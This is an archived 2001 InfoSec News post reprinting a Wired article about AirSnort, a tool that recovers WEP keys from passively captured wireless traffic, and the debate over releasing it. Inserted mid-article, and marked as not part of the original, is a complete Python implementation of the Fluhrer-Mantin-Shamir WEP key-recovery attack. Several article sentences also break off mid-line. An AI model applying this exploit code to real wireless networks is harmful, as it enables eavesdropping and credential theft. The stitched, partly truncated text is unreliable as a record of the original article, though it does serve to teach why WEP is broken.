[ISN] Wireless Networks in Big Trouble

From: InfoSec News (isnat_private)
Date: Tue Aug 21 2001 - 01:04:34 PDT


    By Michelle Delio 
    2:20 p.m. Aug. 20, 2001 PDT 
    Wireless networks are a little less secure today with the public
    release of "AirSnort," a tool that can surreptitiously capture and
    analyze data moving across just about every major wireless network.
    When enough frames have been captured, AirSnort can piece together
    the network's secret WEP key.
    In other words, hackers and/or eavesdroppers using AirSnort can read
    everything that crosses a company's wireless network, out of thin
    AirSnort's abilities aren't groundbreaking: security experts know all
    too well that wireless networks can be easily accessed and monitored
    by outsiders. But a fully featured tool that automates recovery of the
    WEP key wasn't readily available until this past weekend, when
    AirSnort was released on the Internet.
    "AirSnort certainly ups the ante in the sense that with this tool,
    your 'encrypted wireless net' can be quickly and easily breached,"
    said Randy Sandone of Argus, a security company.
    "Once AirSnort breaks the encryption, you're basically hosed. A
    malicious hacker can read any packet traveling over the network,
    gather information, passwords -- you name it."
    Wireless networks transmit information over public airwaves, the same
    medium used by television, radio and cell phones. 802.11b networks are
    supposed to be protected by a built-in security feature, Wired
    Equivalent Privacy (WEP), the encryption mechanism defined in the IEEE
    802.11 standard. WEP encrypts each frame with the RC4 stream cipher
    under a secret key shared by every station on the network, prefixed
    with a 24-bit per-frame initialization vector (IV) that is sent in the
    clear.
    But WEP has proved to be quite crackable. And that's exactly why
    AirSnort was publicly released, said AirSnort programmers Jeremy
    Bruestle and Blake Hegerle. They hope that AirSnort will prove once
    and for all that wireless networks protected only by WEP are not
    "Yes, AirSnort can be used as a cracking tool, but it can also be used
    as a really big stick in an argument over the safety of WEP," Hegerle
    "We felt that the only proper thing to do was to release the project,"
    Bruestle said. "It is not obvious to the layman or the average
    administrator how vulnerable 802.11b is to attack. It's too easy to
    trust WEP. Honestly, there is a lot of work involved in hardening a
    wireless network. It's easy to be complacent. AirSnort is all about
    opening people's eyes."
    Added Sandone: "Perhaps its release will prompt wireless vendors to
    significantly enhance the encryption of their products. And hopefully
    users will come to understand that encryption (regardless of how it is
    used) is not a panacea."
    "Some people overhype the power of encryption, and others put too much
    faith in its 'mathematical precision.' It clearly has its value, but
    it shouldn't be the only security mechanism in use."
    "Weaknesses in the Key Scheduling Algorithm of RC4," a recently
    published paper by Scott Fluhrer, Itsik Mantin and Adi Shamir,
    outlined a way to recover the secret WEP key from passively captured
    frames whose IVs take a particular weak form, which would allow an
    intruder to decrypt every frame and pose as a legitimate user of the
    Adam Stubblefield, a Rice University undergraduate who was working as
    a summer intern at AT&T Labs, tested that attack (with the permission
    of the network's administrator) and was able to recover the network's
    WEP key in just under two hours.
    Stubblefield published his research on the Internet, but did not
    release the program he used to recover the key for AT&T's wireless
    network.
    If the software that he wrote to grab passwords were published,
    Stubblefield told a reporter from The New York Times, anyone with a
    basic knowledge of computers and a wireless network card could easily
    crack many wireless networks.
    "Basically I read the paper and wondered if the attack would actually
    work in the real world, and how hard it would be to implement,"
    Bruestle said. "I am the CEO of a small security firm, Cypher42, and I
    wanted to know just how difficult or easy it would be to implement the
    attack, so we could properly advise clients on 802.11b security."
    Another tool, WEPcrack, was released on the Internet around the same
    time as AirSnort, but WEPcrack is still considered an alpha release, a
    work in progress.
    Bruestle and Hegerle's AirSnort is a beta release, a designation that
    indicates a program is not quite ready for primetime, but is further
    along feature and stability-wise than alpha.
    Bruestle said he and Hegerle had a basic working version of AirSnort
    after less than 24 hours of programming time.
    Bruestle said he has received many e-mails about AirSnort, some in
    favor of the public release of the tool, others accusing him of adding
    to the malicious hackers' arsenal.
    "Many of the people who have e-mailed me about AirSnort are sysadmins
    who thanked me for giving them a way to convince management that WEP
    really is insecure," Bruestle said. "Of course, I have gotten a number
    of flame mails too, comparing the release of AirSnort to 'giving guns
    to children.' I understand the viewpoint of those who believe
    dangerous information should be hidden, but I disagree."
    Hegerle and Bruestle said that they believe that many people did not
    understand the academic nature of Fluhrer, Mantin and Shamir's paper,
    and may not understand how vulnerable wireless systems are.
    "It was beyond even my humble attempts to understand (the paper's)
    full depths," Bruestle said. "The implications of a tool like AirSnort
    are much harder to deny than the paper it was based on."
    AirSnort uses a completely passive attack: An AirSnort user needs only
    a Linux computer with a wireless network card that can be placed in
    monitor mode, so that it captures every frame on the air, and to be
    within radio range of whatever wireless network he or she wishes to
    crack. No association with the network, and no transmission, is
    required.
    Many wireless networks allow amazingly easy access to unauthorized
    users, as some have discovered when their laptops suddenly connect to
    the Internet when they are in or near a building that has a wireless
    "I've been able to connect to networks when standing outside of
    businesses, hospitals or Internet cafés that offer the service," said
    Mark Denon, a freelance technology writer.
    "You can jump in and use the network to send e-mail or surf the Net,
    and often it's quite possible to access whatever information is moving
    across the network. It's very easy to piggyback onto many wireless
    networks, and some people make a game of driving or walking around a
    city and seeing how many networks they can jump into."
    "A wireless card in the machine that's running AirSnort does not send
    out any data or actually talk with any of the other machines on the
    network," said Hegerle. "It simply listens to all the other traffic,
    so it doesn't matter if the network allows unauthorized access, as
    none of the other machines on the network will even know anyone is
    listening."
    The amount of time required to recover a key with AirSnort depends on
    a number of factors, Bruestle said, but mostly depends on the amount
    of network traffic and "luck."
    "On a highly saturated network, AirSnort can usually collect enough
    packets to guess the key in three or four hours. If the network is
    very low traffic, it can take days to get enough data," Bruestle said.
    "Since the attack is based on probability, the actual number of
    packets required to guess a given key varies from key to key,
    sometimes significantly."
    AirSnort monitoring does not have to be all done in one session,
    though. "Five hours one day and five the next works out to be about
    the same as 10 hours in a row," Bruestle said.
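    The passive attack described above, as an added example that is not
    part of the original article and is not AirSnort's own code: a
    self-contained Python simulation of the Fluhrer-Mantin-Shamir
    key-recovery attack on WEP. It builds WEP frames the way the standard
    does (RC4 keyed with IV || secret key, IV sent in the clear), hands
    the attacker a constructed capture containing one frame for every
    weak IV of the form (A+3, 255, X), recovers the 40-bit key byte by
    byte by voting over "resolved" frames, then branches over the
    best-voted candidates and confirms a full key by decrypting a frame.
    The key, payload and capture are constructed for this example; the
    known first plaintext byte (0xAA from the LLC/SNAP header) is the one
    assumption the attack itself relies on. On a real network the weak
    IVs trickle in among millions of ordinary frames, which is why
    AirSnort needs hours of traffic where this simulation needs only
    1,280 frames.

```python
"""Passive FMS-style WEP key recovery, simulated end to end.
Added example, not AirSnort's code: key, IVs and frames are constructed here."""
from collections import Counter
from typing import List, Optional, Tuple

# LLC/SNAP header that begins the plaintext of every 802.11 data frame carrying IP.
# Its first byte (0xAA) is the known plaintext the attack needs.
LLC_SNAP = bytes([0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00])


def rc4_ksa(key: bytes, steps: int = 256) -> Tuple[List[int], int]:
    """Run the first `steps` iterations of RC4 key scheduling; return (S, j)."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_keystream(key: bytes, n: int) -> bytes:
    """First n bytes of RC4 output for `key`."""
    S, _ = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP: the per-frame RC4 key is IV || shared secret and the IV travels in
    the clear. Returns IV || ciphertext (the CRC-32 ICV is omitted here)."""
    ks = rc4_keystream(iv + secret, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, ks))


def simulate_capture(secret: bytes, payload: bytes) -> List[bytes]:
    """Constructed capture: one frame for each FMS weak IV (A+3, 255, X).
    A real network emits these only occasionally among millions of frames,
    which is what makes the attack take hours; here the attacker gets them all."""
    return [wep_encrypt(secret, bytes([a + 3, 255, x]), payload)
            for a in range(len(secret)) for x in range(256)]


def vote_key_byte(frames: List[bytes], known: bytes) -> Counter:
    """Vote for secret byte A = len(known). For each frame, replay KSA steps
    0..A+2 using the public IV and the bytes already recovered; if the state is
    'resolved', the first keystream byte leaks K[A+3] with probability ~e^-3,
    and the wrong guesses from the other frames are spread thinly."""
    a = len(known)
    votes: Counter = Counter()
    for frame in frames:
        iv, z = frame[:3], frame[3] ^ LLC_SNAP[0]   # z = first keystream byte
        S, j = rc4_ksa(iv + known, a + 3)
        if S[1] < a + 3 and (S[1] + S[S[1]]) & 0xFF == a + 3:
            # After step A+3, S[A+3] holds S[j_{A+3}] and is the first output,
            # so j_{A+3} = S.index(z) and K[A+3] = j_{A+3} - j_{A+2} - S[A+3].
            votes[(S.index(z) - j - S[a + 3]) & 0xFF] += 1
    return votes


def verify_key(frames: List[bytes], guess: bytes) -> bool:
    """Decrypt the start of one frame and check that LLC/SNAP comes out."""
    iv, ct = frames[0][:3], frames[0][3:7]
    ks = rc4_keystream(iv + guess, 4)
    return bytes(c ^ k for c, k in zip(ct, ks)) == LLC_SNAP[:4]


def recover_key(frames: List[bytes], key_len: int = 5, branch: int = 5) -> Optional[bytes]:
    """Depth-first search over the `branch` best-voted candidates per byte,
    accepting a full key only when it decrypts a captured frame correctly."""
    def search(known: bytes) -> Optional[bytes]:
        if len(known) == key_len:
            return known if verify_key(frames, known) else None
        for byte, _ in vote_key_byte(frames, known).most_common(branch):
            found = search(known + bytes([byte]))
            if found:
                return found
        return None
    return search(b"")


if __name__ == "__main__":
    SECRET = bytes.fromhex("1f8d07a2e3")                 # constructed 40-bit WEP key
    PAYLOAD = LLC_SNAP + b"\x08\x00" + b"constructed IP packet"
    capture = simulate_capture(SECRET, PAYLOAD)
    recovered = recover_key(capture)
    print(f"{len(capture)} weak-IV frames captured; key recovered: "
          f"{recovered.hex() if recovered else None}")
```

    Run the file directly to watch the key come out. recover_key() returns
    None if no candidate decrypts the sample frame, which is what happens
    when too few resolved frames have been seen for some key byte; the
    branch factor is the same idea AirSnort uses to tolerate a key byte
    that did not win the vote outright.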
    Systems administrators have mixed reactions over the release of
    "Granted, this program will hammer the truth into people's heads about
    the insecure nature of any wireless network protected only by WEP,"
    said Gerry Kaufman, a medical network and systems consultant. "But
    releasing this tool also allows a lot of people access to networks who
    couldn't have cracked them before. I'm really torn between advocating
    open access to information, and keeping tools like AirSnort out of the
    hands of kids with too much free time on their hands."
    Kaufman said the "only good thing" that could come from AirSnort's
    release is its use for proving to "those who approve the expenditures"
    that wireless networks need stronger protection.
    Hegerle and Bruestle suggest that wireless network users look into
    encryption that does not depend on WEP at all, such as an end-to-end
    Virtual Private Network (VPN), to protect data going over wireless
    networks.
    "While this requires more work, the false sense of security WEP offers
    is worse than no security at all," Bruestle said.
    "Quite simply, I won't be happy until there are no people trusting
    their data to WEP as it now exists," Hegerle said. "There are several
    possible ways to change WEP, and I would like to see a new dialog
    begin, one that looks for a replacement to the badly designed WEP we
    are now stuck with."
    Under development are revisions to the 802.11 standard that will
    replace WEP with stronger security features. But the new standards
    won't be released until mid-2002 at the earliest.
    ISN is currently hosted by Attrition.org
    To unsubscribe email majordomoat_private with 'unsubscribe isn' in the BODY
    of the mail.

    This archive was generated by hypermail 2b30 : Tue Aug 21 2001 - 04:09:16 PDT